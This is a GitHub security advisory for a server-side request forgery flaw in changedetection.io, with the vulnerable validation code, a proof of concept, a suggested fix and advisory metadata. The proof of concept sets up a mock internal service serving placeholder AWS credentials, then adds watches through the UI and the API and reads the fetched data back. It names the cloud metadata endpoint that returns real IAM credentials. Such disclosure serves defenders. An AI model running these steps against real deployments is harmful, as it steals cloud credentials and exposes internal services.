GHSA-3C45-4PJ5-CH7M
Vulnerability from github – Published: 2026-02-25 19:08 – Updated: 2026-02-25 19:08

## Summary
Changedetection.io is vulnerable to Server-Side Request Forgery (SSRF) because the URL validation function is_safe_valid_url() does not validate the resolved IP address of watch URLs against private, loopback, or link-local address ranges. An authenticated user (or any user when no password is configured, which is the default) can add a watch for internal network URLs such as:
- `http://169.254.169.254`
- `http://10.0.0.1/`
- `http://127.0.0.1/`
The application fetches these URLs server-side, stores the response content, and makes it viewable through the web UI — enabling full data exfiltration from internal services.
This is particularly severe because:
- The fetched content is stored and viewable - this is not a blind SSRF
- Watches are fetched periodically - creating a persistent SSRF that continuously accesses internal resources
- By default, no password is set - the web UI is accessible without authentication
- Self-hosted deployments typically run on cloud infrastructure where `169.254.169.254` returns real IAM credentials
## Details
The URL validation function is_safe_valid_url() in changedetectionio/validate_url.py (lines 60–122) validates the URL protocol (http/https/ftp) and format using the validators library, but does not perform any DNS resolution or IP address validation:
```python
# changedetectionio/validate_url.py:60-122
@lru_cache(maxsize=1000)
def is_safe_valid_url(test_url):

    safe_protocol_regex = '^(http|https|ftp):'

    # Check protocol
    pattern = re.compile(os.getenv('SAFE_PROTOCOL_REGEX', safe_protocol_regex), re.IGNORECASE)
    if not pattern.match(test_url.strip()):
        return False

    # Check URL format
    if not validators.url(test_url, simple_host=True):
        return False

    return True  # No IP address validation performed
```
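The gap is easy to demonstrate in isolation. The sketch below mirrors only the protocol check from `is_safe_valid_url()` (the `validators.url()` format check is omitted here, since it likewise does not reject private or link-local hosts); `passes_protocol_check` is a hypothetical name for this illustration:

```python
import re

# Mirror of the protocol regex used by is_safe_valid_url(); nothing about
# the target host or its resolved IP address is inspected.
SAFE_PROTOCOL_REGEX = re.compile(r'^(http|https|ftp):', re.IGNORECASE)

def passes_protocol_check(test_url: str) -> bool:
    """Return True when the URL's scheme alone satisfies the filter."""
    return bool(SAFE_PROTOCOL_REGEX.match(test_url.strip()))

print(passes_protocol_check('http://169.254.169.254'))  # True
print(passes_protocol_check('http://127.0.0.1/'))       # True
print(passes_protocol_check('file:///etc/passwd'))      # False
```

All three internal targets from the summary pass this filter; only the scheme is ever rejected.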
The HTTP fetcher in changedetectionio/content_fetchers/requests.py (lines 83–89) then makes the request without any additional IP validation:
```python
# changedetectionio/content_fetchers/requests.py:83-89
r = session.request(method=request_method,
                    url=url,  # User-provided URL, no IP validation
                    headers=request_headers,
                    timeout=timeout,
                    proxies=proxies,
                    verify=False)
```
The response content is stored and made available to the user:
```python
# changedetectionio/content_fetchers/requests.py:140-142
self.content = r.text         # Text content stored
self.raw_content = r.content  # Raw bytes stored
```
This validation gap exists in all entry points that accept watch URLs:
- Web UI: `changedetectionio/store/__init__.py:718`
- REST API: `changedetectionio/api/watch.py:163, 428`
- Import API: `changedetectionio/api/import.py:188`
All use the same is_safe_valid_url() function, so a single fix addresses all paths.
## PoC

### Prerequisites
- A changedetection.io instance (Docker deployment)
- Network access to the instance (default port 5000)
### Step 1: Deploy changedetection.io with an internal service
Create `internal-service.py`:

```python
#!/usr/bin/env python3
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

class H(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps({
            'Code': 'Success',
            'AccessKeyId': 'AKIAIOSFODNN7EXAMPLE',
            'SecretAccessKey': 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
            'Token': 'FwoGZXIvYXdzEBYaDExampleSessionToken'
        }).encode())

HTTPServer(('0.0.0.0', 80), H).serve_forever()
```
Create `Dockerfile.internal`:

```dockerfile
FROM python:3.11-slim
COPY internal-service.py /server.py
CMD ["python3", "/server.py"]
```
Create `docker-compose.yml`:

```yaml
version: "3.8"
services:
  changedetection:
    image: ghcr.io/dgtlmoon/changedetection.io
    ports:
      - "5000:5000"
    volumes:
      - ./datastore:/datastore

  internal-service:
    build:
      context: .
      dockerfile: Dockerfile.internal
```

Start the stack:

```bash
docker compose up -d
```
### Step 2: Add a watch for the internal service

Open `http://localhost:5000/` in a browser (no password required by default).

In the URL field, enter:

```
http://internal-service/
```

Click **Watch** and wait for the first check to complete.
### Step 3: View the exfiltrated data

Click on the watch entry, then click **Preview**. The page displays the internal service's response containing the simulated credentials:

```json
{
  "Code": "Success",
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  ...
}
```
### Step 4: Verify via API (alternative)

```bash
# Get the API key (visible in Settings page of the unauthenticated web UI)
API_KEY=$(docker compose exec changedetection cat /datastore/url-watches.json | \
  python3 -c "import sys,json; print(json.load(sys.stdin)['settings']['application']['api_access_token'])")

# Create a watch via API
WATCH_RESPONSE=$(curl -s -X POST "http://localhost:5000/api/v1/watch" \
  -H "x-api-key: $API_KEY" \
  -H "Content-Type: application/json" \
  -d '{"url": "http://internal-service/"}')

WATCH_UUID=$(echo "$WATCH_RESPONSE" | python3 -c "import sys,json; print(json.load(sys.stdin)['uuid'])")
echo "Watch created: $WATCH_UUID"

# Wait for the first fetch to complete
echo "Waiting 30s for first fetch..."
sleep 30

# Retrieve the exfiltrated data via API
LATEST_TS=$(curl -s "http://localhost:5000/api/v1/watch/$WATCH_UUID/history" \
  -H "x-api-key: $API_KEY" | \
  python3 -c "import sys,json; h=json.load(sys.stdin); print(sorted(h.keys())[-1] if h else '')")

echo "=== EXFILTRATED DATA ==="
curl -s "http://localhost:5000/api/v1/watch/$WATCH_UUID/history/$LATEST_TS" \
  -H "x-api-key: $API_KEY"
```
Expected output: the internal service's response containing simulated credentials:

```json
{
  "Code": "Success",
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  ...
}
```
In a real cloud deployment, replacing `http://internal-service/` with:

```
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

would return real AWS IAM credentials.
## Impact

**Who is impacted:**
All self-hosted changedetection.io deployments, particularly those running on cloud infrastructure (AWS, GCP, Azure) where the instance metadata service at `169.254.169.254` is accessible.
**What an attacker can do:**

- **Steal cloud credentials:** Access the cloud metadata endpoint to obtain IAM credentials, service account tokens, or managed identity tokens
- **Scan internal networks:** Discover internal services by adding watches for internal IP ranges and observing responses
- **Access internal services:** Read data from internal APIs, databases, and admin interfaces that are not exposed to the internet
- **Persistent access:** Watches are fetched periodically on a configurable schedule, providing continuous access to internal resources
- **No authentication required by default:** The web UI has no password set by default, allowing any user with network access to exploit this vulnerability
### Suggested Remediation

Add IP address validation to `is_safe_valid_url()` in `changedetectionio/validate_url.py`:
```python
import ipaddress
import socket

BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),     # Loopback
    ipaddress.ip_network('10.0.0.0/8'),      # Private (RFC 1918)
    ipaddress.ip_network('172.16.0.0/12'),   # Private (RFC 1918)
    ipaddress.ip_network('192.168.0.0/16'),  # Private (RFC 1918)
    ipaddress.ip_network('169.254.0.0/16'),  # Link-local / Cloud metadata
    ipaddress.ip_network('::1/128'),         # IPv6 loopback
    ipaddress.ip_network('fc00::/7'),        # IPv6 unique local
    ipaddress.ip_network('fe80::/10'),       # IPv6 link-local
]

def is_private_ip(hostname):
    """Check if a hostname resolves to a private/reserved IP address."""
    try:
        for info in socket.getaddrinfo(hostname, None):
            ip = ipaddress.ip_address(info[4][0])
            for network in BLOCKED_NETWORKS:
                if ip in network:
                    return True
    except socket.gaierror:
        return True  # Block unresolvable hostnames
    return False
```
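As an aside, Python's `ipaddress` module already exposes classification flags (`is_private`, `is_loopback`, `is_link_local`, `is_reserved`) that cover most of the blocklist above. A compact alternative sketch, not part of the proposed patch and with an illustrative function name:

```python
import ipaddress
import socket

def resolves_to_private(hostname: str) -> bool:
    """Variant of the check using ipaddress' built-in classification flags
    instead of an explicit blocklist of networks."""
    try:
        infos = socket.getaddrinfo(hostname, None)
    except socket.gaierror:
        return True  # Block unresolvable hostnames, as above
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return True
    return False

print(resolves_to_private('127.0.0.1'))        # True
print(resolves_to_private('169.254.169.254'))  # True
```

The explicit blocklist makes the policy visible and tunable; the flag-based variant tracks the IANA special-purpose registries that `ipaddress` ships with.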
Then add to `is_safe_valid_url()` before the final `return True` (importing `urlparse` from `urllib.parse` if the module does not already do so):

```python
# Check for private/reserved IP addresses
parsed = urlparse(test_url)
if parsed.hostname and is_private_ip(parsed.hostname):
    logger.warning(f"URL '{test_url}' resolves to a private/reserved IP address")
    return False
```
An environment variable (e.g., ALLOW_PRIVATE_IPS=true) could be provided for users who intentionally need to monitor internal services.
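A minimal sketch of how such an opt-out could gate the check; the variable name follows the suggestion above, and the function names are illustrative, not part of the current codebase:

```python
import os

def _truthy(value: str) -> bool:
    """Interpret common 'enabled' spellings of an environment variable."""
    return value.strip().lower() in ('1', 'true', 'yes')

def should_block_private_ips() -> bool:
    """Block private/reserved IPs unless the operator explicitly opts out."""
    return not _truthy(os.getenv('ALLOW_PRIVATE_IPS', 'false'))

print(should_block_private_ips())  # True unless ALLOW_PRIVATE_IPS is set to a truthy value
```

Defaulting to blocking keeps the secure behavior for the common case while letting operators who deliberately monitor internal services restore the old behavior.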
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "changedetection.io"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.54.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27696"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T19:08:18Z",
"nvd_published_at": "2026-02-25T05:17:26Z",
"severity": "HIGH"
},
"id": "GHSA-3c45-4pj5-ch7m",
"modified": "2026-02-25T19:08:18Z",
"published": "2026-02-25T19:08:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-3c45-4pj5-ch7m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27696"
},
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/commit/fe7aa38c651d73fe5f41ce09855fa8f97193747b"
},
{
"type": "PACKAGE",
"url": "https://github.com/dgtlmoon/changedetection.io"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "changedetection.io is Vulnerable to SSRF via Watch URLs"
}
## Sightings

| Author | Source | Type | Date |
|---|---|---|---|

### Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.